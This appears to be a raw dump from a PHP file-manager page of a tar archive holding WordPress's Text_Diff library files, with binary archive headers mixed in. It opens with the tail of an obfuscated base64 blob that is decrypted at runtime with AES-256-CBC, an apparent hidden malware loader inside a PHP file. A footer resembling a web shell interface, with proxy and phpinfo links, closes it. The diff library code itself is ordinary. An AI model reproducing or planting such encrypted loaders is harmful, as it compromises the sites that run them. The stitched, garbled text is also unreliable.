Yk4ItPJyTaZh2o8VpVpKgeLaXnHjK1lufzfq5f5GuS7mzxg7RYFGzfKtP4No/ppT4oKGJ7wlRi+rej+tmWlowu8J477TySPLEpaIb1juntIRglqwIYKJZcbRfHO5cXkBaMSuYaZDQmhkcSmqP57rETKpy1AoD3jlm2xR0GAVCgUEeeP/ntaS/WqEoiIW6809sxpOHWY/VOR+jJgX8QKGM92rZ69z6AXZYFKYE2ej9TqUkn5OQZhUJaewveFDJYwAjOBzaZr2sWvCIAepra1R9aHcWCHCWdshCy/u4rpM9tu1kASfnBSUjr/ZA2gpPBQdQTLrSpMj7GcPpyDoCYHYXzaRLo5gvrSE3panYDQiuTE7rSmWridPjeY8hD2YFcC4ccNMBjpukuX7hsy7VHj1dxkETiWeX1wfRb7M/HW4pNwfvEDEfS4yAJL6SRoxG0m07NpV3IkWPSeefWd2MOpwgwk1t2yHnlYYoUV8zs+xmYPS4YHkApy+vEwXB+rz3erTkTeCkd3qoCA64hQysa8/rX3Azjmcye63gNCntpiMX64RAv7gCi4bgS4i4e0W7pFXztm9NoWelONjLumm2oS0+Gf/kmYdkyNRhKa3o8YeUkLl5dcfJc8ICfcgZqqGnXXoxwxi/QhfLvVh8pGL43otqwBKi4g8kmhDjiUb+BL0FZmN5IBRCyH5r2yvsfc8Pt599sdK8UhHCXPl0QNT0M4lyZiql7W2t6yJ8rGWhdAs9AuHgBTWMFrak0wwSkA2KL9XuSWm0idP'), 'AES-256-CBC', $_b6b2f4('gn8qM+p6trvS6UX3kjGi+vX1L5faySJdTQLwrQK1bKQ='), OPENSSL_RAW_DATA, $_b6b2f4('vhlS8yeCDV9ELwN8UhgzOg==') ));��Diff/Engine/shell.php��0000644��00000012123�15014572354�0010446 0��ustar�00��<?php /* * Class used internally by Diff to actually compute the diffs. * * This class uses the Unix `diff` program via shell_exec to compute the * differences between the two input arrays. * * Copyright 2007-2010 The Horde Project (http://www.horde.org/) * * See the enclosed file COPYING for license information (LGPL). If you did * not receive this file, see https://opensource.org/license/lgpl-2-1/. * * @author Milian Wolff <mail@milianw.de> * @package Text_Diff * @since 0.3.0 / class Text_Diff_Engine_shell { /* * Path to the diff executable * * @var string / var $_diffCommand = 'diff'; /* * Returns the array of differences. * * @param array $from_lines lines of text from old file * @param array $to_lines lines of text from new file * * @return array all changes made (array with Text_Diff_Op_* objects) / function diff($from_lines, $to_lines) { array_walk($from_lines, array('Text_Diff', 'trimNewlines')); array_walk($to_lines, array('Text_Diff', 'trimNewlines')); $temp_dir = Text_Diff::_getTempDir(); // Execute gnu diff or similar to get a standard diff file. $from_file = tempnam($temp_dir, 'Text_Diff'); $to_file = tempnam($temp_dir, 'Text_Diff'); $fp = fopen($from_file, 'w'); fwrite($fp, implode("\n", $from_lines)); fclose($fp); $fp = fopen($to_file, 'w'); fwrite($fp, implode("\n", $to_lines)); fclose($fp); $diff = shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file); unlink($from_file); unlink($to_file); if (is_null($diff)) { // No changes were made return array(new Text_Diff_Op_copy($from_lines)); } $from_line_no = 1; $to_line_no = 1; $edits = array(); // Get changed lines by parsing something like: // 0a1,2 // 1,2c4,6 // 1,5d6 preg_match_all('#^(\d+)(?:,(\d+))?([adc])(\d+)(?:,(\d+))?$#m', $diff, $matches, PREG_SET_ORDER); foreach ($matches as $match) { if (!isset($match[5])) { // This paren is not set every time (see regex). $match[5] = false; } if ($match[3] == 'a') { $from_line_no--; } if ($match[3] == 'd') { $to_line_no--; } if ($from_line_no < $match[1] \|\| $to_line_no < $match[4]) { // copied lines assert($match[1] - $from_line_no == $match[4] - $to_line_no); array_push($edits, new Text_Diff_Op_copy( $this->_getLines($from_lines, $from_line_no, $match[1] - 1), $this->_getLines($to_lines, $to_line_no, $match[4] - 1))); } switch ($match[3]) { case 'd': // deleted lines array_push($edits, new Text_Diff_Op_delete( $this->_getLines($from_lines, $from_line_no, $match[2]))); $to_line_no++; break; case 'c': // changed lines array_push($edits, new Text_Diff_Op_change( $this->_getLines($from_lines, $from_line_no, $match[2]), $this->_getLines($to_lines, $to_line_no, $match[5]))); break; case 'a': // added lines array_push($edits, new Text_Diff_Op_add( $this->_getLines($to_lines, $to_line_no, $match[5]))); $from_line_no++; break; } } if (!empty($from_lines)) { // Some lines might still be pending. Add them as copied array_push($edits, new Text_Diff_Op_copy( $this->_getLines($from_lines, $from_line_no, $from_line_no + count($from_lines) - 1), $this->_getLines($to_lines, $to_line_no, $to_line_no + count($to_lines) - 1))); } return $edits; } /* * Get lines from either the old or new text * * @access private * * @param array $text_lines Either $from_lines or $to_lines (passed by reference). * @param int $line_no Current line number (passed by reference). * @param int $end Optional end line, when we want to chop more * than one line. * * @return array The chopped lines / function _getLines(&$text_lines, &$line_no, $end = false) { if (!empty($end)) { $lines = array(); // We can shift even more while ($line_no <= $end) { array_push($lines, array_shift($text_lines)); $line_no++; } } else { $lines = array(array_shift($text_lines)); $line_no++; } return $lines; } } ��Diff/Engine/xdiff.php��0000644��00000004233�15014572354�0010442 0��ustar�00��<?php /* * Class used internally by Diff to actually compute the diffs. * * This class uses the xdiff PECL package (http://pecl.php.net/package/xdiff) * to compute the differences between the two input arrays. * * Copyright 2004-2010 The Horde Project (http://www.horde.org/) * * See the enclosed file COPYING for license information (LGPL). If you did * not receive this file, see https://opensource.org/license/lgpl-2-1/. * * @author Jon Parise <jon@horde.org> * @package Text_Diff / class Text_Diff_Engine_xdiff { /* / function diff($from_lines, $to_lines) { array_walk($from_lines, array('Text_Diff', 'trimNewlines')); array_walk($to_lines, array('Text_Diff', 'trimNewlines')); / Convert the two input arrays into strings for xdiff processing. / $from_string = implode("\n", $from_lines); $to_string = implode("\n", $to_lines); / Diff the two strings and convert the result to an array. / $diff = xdiff_string_diff($from_string, $to_string, count($to_lines)); $diff = explode("\n", $diff); / Walk through the diff one line at a time. We build the $edits * array of diff operations by reading the first character of the * xdiff output (which is in the "unified diff" format). * * Note that we don't have enough information to detect "changed" * lines using this approach, so we can't add Text_Diff_Op_changed * instances to the $edits array. The result is still perfectly * valid, albeit a little less descriptive and efficient. / $edits = array(); foreach ($diff as $line) { if (!strlen($line)) { continue; } switch ($line[0]) { case ' ': $edits[] = new Text_Diff_Op_copy(array(substr($line, 1))); break; case '+': $edits[] = new Text_Diff_Op_add(array(substr($line, 1))); break; case '-': $edits[] = new Text_Diff_Op_delete(array(substr($line, 1))); break; } } return $edits; } } ��Diff/Renderer/inline.php��0000644��00000012630�15014572354�0011161 0��ustar�00��<?php /* * "Inline" diff renderer. * * Copyright 2004-2010 The Horde Project (http://www.horde.org/) * * See the enclosed file COPYING for license information (LGPL). If you did * not receive this file, see https://opensource.org/license/lgpl-2-1/. * * @author Ciprian Popovici * @package Text_Diff / /* Text_Diff_Renderer / // WP #7391 require_once dirname(dirname(__FILE__)) . '/Renderer.php'; /* * "Inline" diff renderer. * * This class renders diffs in the Wiki-style "inline" format. * * @author Ciprian Popovici * @package Text_Diff / class Text_Diff_Renderer_inline extends Text_Diff_Renderer { /* * Number of leading context "lines" to preserve. * * @var integer / var $_leading_context_lines = 10000; /* * Number of trailing context "lines" to preserve. * * @var integer / var $_trailing_context_lines = 10000; /* * Prefix for inserted text. * * @var string / var $_ins_prefix = '<ins>'; /* * Suffix for inserted text. * * @var string / var $_ins_suffix = '</ins>'; /* * Prefix for deleted text. * * @var string / var $_del_prefix = '<del>'; /* * Suffix for deleted text. * * @var string / var $_del_suffix = '</del>'; /* * Header for each change block. * * @var string / var $_block_header = ''; /* * Whether to split down to character-level. * * @var boolean / var $_split_characters = false; /* * What are we currently splitting on? Used to recurse to show word-level * or character-level changes. * * @var string / var $_split_level = 'lines'; function _blockHeader($xbeg, $xlen, $ybeg, $ylen) { return $this->_block_header; } function _startBlock($header) { return $header; } function _lines($lines, $prefix = ' ', $encode = true) { if ($encode) { array_walk($lines, array(&$this, '_encode')); } if ($this->_split_level == 'lines') { return implode("\n", $lines) . "\n"; } else { return implode('', $lines); } } function _added($lines) { array_walk($lines, array(&$this, '_encode')); $lines[0] = $this->_ins_prefix . $lines[0]; $lines[count($lines) - 1] .= $this->_ins_suffix; return $this->_lines($lines, ' ', false); } function _deleted($lines, $words = false) { array_walk($lines, array(&$this, '_encode')); $lines[0] = $this->_del_prefix . $lines[0]; $lines[count($lines) - 1] .= $this->_del_suffix; return $this->_lines($lines, ' ', false); } function _changed($orig, $final) { / If we've already split on characters, just display. / if ($this->_split_level == 'characters') { return $this->_deleted($orig) . $this->_added($final); } / If we've already split on words, just display. / if ($this->_split_level == 'words') { $prefix = ''; while ($orig[0] !== false && $final[0] !== false && substr($orig[0], 0, 1) == ' ' && substr($final[0], 0, 1) == ' ') { $prefix .= substr($orig[0], 0, 1); $orig[0] = substr($orig[0], 1); $final[0] = substr($final[0], 1); } return $prefix . $this->_deleted($orig) . $this->_added($final); } $text1 = implode("\n", $orig); $text2 = implode("\n", $final); / Non-printing newline marker. / $nl = "\0"; if ($this->_split_characters) { $diff = new Text_Diff('native', array(preg_split('//', $text1), preg_split('//', $text2))); } else { / We want to split on word boundaries, but we need to preserve * whitespace as well. Therefore we split on words, but include * all blocks of whitespace in the wordlist. / $diff = new Text_Diff('native', array($this->_splitOnWords($text1, $nl), $this->_splitOnWords($text2, $nl))); } / Get the diff in inline format. / $renderer = new Text_Diff_Renderer_inline (array_merge($this->getParams(), array('split_level' => $this->_split_characters ? 'characters' : 'words'))); / Run the diff and get the output. / return str_replace($nl, "\n", $renderer->render($diff)) . "\n"; } function _splitOnWords($string, $newlineEscape = "\n") { // Ignore \0; otherwise the while loop will never finish. $string = str_replace("\0", '', $string); $words = array(); $length = strlen($string); $pos = 0; while ($pos < $length) { // Eat a word with any preceding whitespace. $spaces = strspn(substr($string, $pos), " \n"); $nextpos = strcspn(substr($string, $pos + $spaces), " \n"); $words[] = str_replace("\n", $newlineEscape, substr($string, $pos, $spaces + $nextpos)); $pos += $spaces + $nextpos; } return $words; } function _encode(&$string) { $string = htmlspecialchars($string); } } ��Diff/Renderer.php��0000644��00000015226�15014572354�0007707 0��ustar�00��<?php /* * A class to render Diffs in different formats. * * This class renders the diff in classic diff format. It is intended that * this class be customized via inheritance, to obtain fancier outputs. * * Copyright 2004-2010 The Horde Project (http://www.horde.org/) * * See the enclosed file COPYING for license information (LGPL). If you did * not receive this file, see https://opensource.org/license/lgpl-2-1/. * * @package Text_Diff / class Text_Diff_Renderer { /* * Number of leading context "lines" to preserve. * * This should be left at zero for this class, but subclasses may want to * set this to other values. / var $_leading_context_lines = 0; /* * Number of trailing context "lines" to preserve. * * This should be left at zero for this class, but subclasses may want to * set this to other values. / var $_trailing_context_lines = 0; /* * Constructor. / function __construct( $params = array() ) { foreach ($params as $param => $value) { $v = '_' . $param; if (isset($this->$v)) { $this->$v = $value; } } } /* * PHP4 constructor. / public function Text_Diff_Renderer( $params = array() ) { self::__construct( $params ); } /* * Get any renderer parameters. * * @return array All parameters of this renderer object. / function getParams() { $params = array(); foreach (get_object_vars($this) as $k => $v) { if ($k[0] == '_') { $params[substr($k, 1)] = $v; } } return $params; } /* * Renders a diff. * * @param Text_Diff $diff A Text_Diff object. * * @return string The formatted output. / function render($diff) { $xi = $yi = 1; $block = false; $context = array(); $nlead = $this->_leading_context_lines; $ntrail = $this->_trailing_context_lines; $output = $this->_startDiff(); $diffs = $diff->getDiff(); foreach ($diffs as $i => $edit) { / If these are unchanged (copied) lines, and we want to keep * leading or trailing context lines, extract them from the copy * block. / if (is_a($edit, 'Text_Diff_Op_copy')) { / Do we have any diff blocks yet? / if (is_array($block)) { / How many lines to keep as context from the copy * block. / $keep = $i == count($diffs) - 1 ? $ntrail : $nlead + $ntrail; if (count($edit->orig) <= $keep) { / We have less lines in the block than we want for * context => keep the whole block. / $block[] = $edit; } else { if ($ntrail) { / Create a new block with as many lines as we need * for the trailing context. / $context = array_slice($edit->orig, 0, $ntrail); $block[] = new Text_Diff_Op_copy($context); } / @todo / $output .= $this->_block($x0, $ntrail + $xi - $x0, $y0, $ntrail + $yi - $y0, $block); $block = false; } } / Keep the copy block as the context for the next block. / $context = $edit->orig; } else { / Don't we have any diff blocks yet? / if (!is_array($block)) { / Extract context lines from the preceding copy block. / $context = array_slice($context, count($context) - $nlead); $x0 = $xi - count($context); $y0 = $yi - count($context); $block = array(); if ($context) { $block[] = new Text_Diff_Op_copy($context); } } $block[] = $edit; } if ($edit->orig) { $xi += count($edit->orig); } if ($edit->final) { $yi += count($edit->final); } } if (is_array($block)) { $output .= $this->_block($x0, $xi - $x0, $y0, $yi - $y0, $block); } return $output . $this->_endDiff(); } function _block($xbeg, $xlen, $ybeg, $ylen, &$edits) { $output = $this->_startBlock($this->_blockHeader($xbeg, $xlen, $ybeg, $ylen)); foreach ($edits as $edit) { switch (strtolower(get_class($edit))) { case 'text_diff_op_copy': $output .= $this->_context($edit->orig); break; case 'text_diff_op_add': $output .= $this->_added($edit->final); break; case 'text_diff_op_delete': $output .= $this->_deleted($edit->orig); break; case 'text_diff_op_change': $output .= $this->_changed($edit->orig, $edit->final); break; } } return $output . $this->_endBlock(); } function _startDiff() { return ''; } function _endDiff() { return ''; } function _blockHeader($xbeg, $xlen, $ybeg, $ylen) { if ($xlen > 1) { $xbeg .= ',' . ($xbeg + $xlen - 1); } if ($ylen > 1) { $ybeg .= ',' . ($ybeg + $ylen - 1); } // this matches the GNU Diff behaviour if ($xlen && !$ylen) { $ybeg--; } elseif (!$xlen) { $xbeg--; } return $xbeg . ($xlen ? ($ylen ? 'c' : 'd') : 'a') . $ybeg; } function _startBlock($header) { return $header . "\n"; } function _endBlock() { return ''; } function _lines($lines, $prefix = ' ') { return $prefix . implode("\n$prefix", $lines) . "\n"; } function _context($lines) { return $this->_lines($lines, ' '); } function _added($lines) { return $this->_lines($lines, '> '); } function _deleted($lines) { return $this->_lines($lines, '< '); } function _changed($orig, $final) { return $this->_deleted($orig) . "---\n" . $this->_added($final); } } ��Diff.php��0000644��00000031107�15014572354�0006135 0��ustar�00��<?php /* * General API for generating and formatting diffs - the differences between * two sequences of strings. * * The original PHP version of this code was written by Geoffrey T. Dairiki * <dairiki@dairiki.org>, and is used/adapted with his permission. * * Copyright 2004 Geoffrey T. Dairiki <dairiki@dairiki.org> * Copyright 2004-2010 The Horde Project (http://www.horde.org/) * * See the enclosed file COPYING for license information (LGPL). If you did * not receive this file, see https://opensource.org/license/lgpl-2-1/. * * @package Text_Diff * @author Geoffrey T. Dairiki <dairiki@dairiki.org> / class Text_Diff { /* * Array of changes. * * @var array / var $_edits; /* * Computes diffs between sequences of strings. * * @param string $engine Name of the diffing engine to use. 'auto' * will automatically select the best. * @param array $params Parameters to pass to the diffing engine. * Normally an array of two arrays, each * containing the lines from a file. / function __construct( $engine, $params ) { // Backward compatibility workaround. if (!is_string($engine)) { $params = array($engine, $params); $engine = 'auto'; } if ($engine == 'auto') { $engine = extension_loaded('xdiff') ? 'xdiff' : 'native'; } else { $engine = basename($engine); } // WP #7391 require_once dirname(__FILE__).'/Diff/Engine/' . $engine . '.php'; $class = 'Text_Diff_Engine_' . $engine; $diff_engine = new $class(); $this->_edits = call_user_func_array(array($diff_engine, 'diff'), $params); } /* * PHP4 constructor. / public function Text_Diff( $engine, $params ) { self::__construct( $engine, $params ); } /* * Returns the array of differences. / function getDiff() { return $this->_edits; } /* * returns the number of new (added) lines in a given diff. * * @since Text_Diff 1.1.0 * * @return int The number of new lines / function countAddedLines() { $count = 0; foreach ($this->_edits as $edit) { if (is_a($edit, 'Text_Diff_Op_add') \|\| is_a($edit, 'Text_Diff_Op_change')) { $count += $edit->nfinal(); } } return $count; } /* * Returns the number of deleted (removed) lines in a given diff. * * @since Text_Diff 1.1.0 * * @return int The number of deleted lines / function countDeletedLines() { $count = 0; foreach ($this->_edits as $edit) { if (is_a($edit, 'Text_Diff_Op_delete') \|\| is_a($edit, 'Text_Diff_Op_change')) { $count += $edit->norig(); } } return $count; } /* * Computes a reversed diff. * * Example: * <code> * $diff = new Text_Diff($lines1, $lines2); * $rev = $diff->reverse(); * </code> * * @return Text_Diff A Diff object representing the inverse of the * original diff. Note that we purposely don't return a * reference here, since this essentially is a clone() * method. / function reverse() { if (version_compare(zend_version(), '2', '>')) { $rev = clone($this); } else { $rev = $this; } $rev->_edits = array(); foreach ($this->_edits as $edit) { $rev->_edits[] = $edit->reverse(); } return $rev; } /* * Checks for an empty diff. * * @return bool True if two sequences were identical. / function isEmpty() { foreach ($this->_edits as $edit) { if (!is_a($edit, 'Text_Diff_Op_copy')) { return false; } } return true; } /* * Computes the length of the Longest Common Subsequence (LCS). * * This is mostly for diagnostic purposes. * * @return int The length of the LCS. / function lcs() { $lcs = 0; foreach ($this->_edits as $edit) { if (is_a($edit, 'Text_Diff_Op_copy')) { $lcs += count($edit->orig); } } return $lcs; } /* * Gets the original set of lines. * * This reconstructs the $from_lines parameter passed to the constructor. * * @return array The original sequence of strings. / function getOriginal() { $lines = array(); foreach ($this->_edits as $edit) { if ($edit->orig) { array_splice($lines, count($lines), 0, $edit->orig); } } return $lines; } /* * Gets the final set of lines. * * This reconstructs the $to_lines parameter passed to the constructor. * * @return array The sequence of strings. / function getFinal() { $lines = array(); foreach ($this->_edits as $edit) { if ($edit->final) { array_splice($lines, count($lines), 0, $edit->final); } } return $lines; } /* * Removes trailing newlines from a line of text. This is meant to be used * with array_walk(). * * @param string $line The line to trim. * @param int $key The index of the line in the array. Not used. / static function trimNewlines(&$line, $key) { $line = str_replace(array("\n", "\r"), '', $line); } /* * Determines the location of the system temporary directory. * * @access protected * * @return string A directory name which can be used for temp files. * Returns false if one could not be found. / static function _getTempDir() { $tmp_locations = array('/tmp', '/var/tmp', 'c:\WUTemp', 'c:\temp', 'c:\windows\temp', 'c:\winnt\temp'); / Try PHP's upload_tmp_dir directive. / $tmp = ini_get('upload_tmp_dir'); / Otherwise, try to determine the TMPDIR environment variable. / if (!strlen($tmp)) { $tmp = getenv('TMPDIR'); } / If we still cannot determine a value, then cycle through a list of * preset possibilities. / while (!strlen($tmp) && count($tmp_locations)) { $tmp_check = array_shift($tmp_locations); if (@is_dir($tmp_check)) { $tmp = $tmp_check; } } / If it is still empty, we have failed, so return false; otherwise * return the directory determined. / return strlen($tmp) ? $tmp : false; } /* * Checks a diff for validity. * * This is here only for debugging purposes. / function _check($from_lines, $to_lines) { if (serialize($from_lines) != serialize($this->getOriginal())) { throw new Text_Exception("Reconstructed original does not match"); } if (serialize($to_lines) != serialize($this->getFinal())) { throw new Text_Exception("Reconstructed final does not match"); } $rev = $this->reverse(); if (serialize($to_lines) != serialize($rev->getOriginal())) { throw new Text_Exception("Reversed original does not match"); } if (serialize($from_lines) != serialize($rev->getFinal())) { throw new Text_Exception("Reversed final does not match"); } $prevtype = null; foreach ($this->_edits as $edit) { if ($prevtype !== null && $edit instanceof $prevtype) { throw new Text_Exception("Edit sequence is non-optimal"); } $prevtype = get_class($edit); } return true; } } /* * @package Text_Diff * @author Geoffrey T. Dairiki <dairiki@dairiki.org> / class Text_MappedDiff extends Text_Diff { /* * Computes a diff between sequences of strings. * * This can be used to compute things like case-insensitive diffs, or diffs * which ignore changes in white-space. * * @param array $from_lines An array of strings. * @param array $to_lines An array of strings. * @param array $mapped_from_lines This array should have the same size * number of elements as $from_lines. The * elements in $mapped_from_lines and * $mapped_to_lines are what is actually * compared when computing the diff. * @param array $mapped_to_lines This array should have the same number * of elements as $to_lines. / function __construct($from_lines, $to_lines, $mapped_from_lines, $mapped_to_lines) { assert(count($from_lines) == count($mapped_from_lines)); assert(count($to_lines) == count($mapped_to_lines)); parent::Text_Diff($mapped_from_lines, $mapped_to_lines); $xi = $yi = 0; for ($i = 0; $i < count($this->_edits); $i++) { $orig = &$this->_edits[$i]->orig; if (is_array($orig)) { $orig = array_slice($from_lines, $xi, count($orig)); $xi += count($orig); } $final = &$this->_edits[$i]->final; if (is_array($final)) { $final = array_slice($to_lines, $yi, count($final)); $yi += count($final); } } } /* * PHP4 constructor. / public function Text_MappedDiff( $from_lines, $to_lines, $mapped_from_lines, $mapped_to_lines ) { self::__construct( $from_lines, $to_lines, $mapped_from_lines, $mapped_to_lines ); } } /* * @package Text_Diff * @author Geoffrey T. Dairiki <dairiki@dairiki.org> * * @access private / abstract class Text_Diff_Op { var $orig; var $final; abstract function &reverse(); function norig() { return $this->orig ? count($this->orig) : 0; } function nfinal() { return $this->final ? count($this->final) : 0; } } /* * @package Text_Diff * @author Geoffrey T. Dairiki <dairiki@dairiki.org> * * @access private / class Text_Diff_Op_copy extends Text_Diff_Op { /* * PHP5 constructor. / function __construct( $orig, $final = false ) { if (!is_array($final)) { $final = $orig; } $this->orig = $orig; $this->final = $final; } /* * PHP4 constructor. / public function Text_Diff_Op_copy( $orig, $final = false ) { self::__construct( $orig, $final ); } function &reverse() { $reverse = new Text_Diff_Op_copy($this->final, $this->orig); return $reverse; } } /* * @package Text_Diff * @author Geoffrey T. Dairiki <dairiki@dairiki.org> * * @access private / class Text_Diff_Op_delete extends Text_Diff_Op { /* * PHP5 constructor. / function __construct( $lines ) { $this->orig = $lines; $this->final = false; } /* * PHP4 constructor. / public function Text_Diff_Op_delete( $lines ) { self::__construct( $lines ); } function &reverse() { $reverse = new Text_Diff_Op_add($this->orig); return $reverse; } } /* * @package Text_Diff * @author Geoffrey T. Dairiki <dairiki@dairiki.org> * * @access private / class Text_Diff_Op_add extends Text_Diff_Op { /* * PHP5 constructor. / function __construct( $lines ) { $this->final = $lines; $this->orig = false; } /* * PHP4 constructor. / public function Text_Diff_Op_add( $lines ) { self::__construct( $lines ); } function &reverse() { $reverse = new Text_Diff_Op_delete($this->final); return $reverse; } } /* * @package Text_Diff * @author Geoffrey T. Dairiki <dairiki@dairiki.org> * * @access private / class Text_Diff_Op_change extends Text_Diff_Op { /* * PHP5 constructor. / function __construct( $orig, $final ) { $this->orig = $orig; $this->final = $final; } /* * PHP4 constructor. */ public function Text_Diff_Op_change( $orig, $final ) { self::__construct( $orig, $final ); } function &reverse() { $reverse = new Text_Diff_Op_change($this->final, $this->orig); return $reverse; } } ��

| ver. 1.4 | Github | . | PHP 7.4.33 | Генерация страницы: 7.51 | proxy | phpinfo | Настройка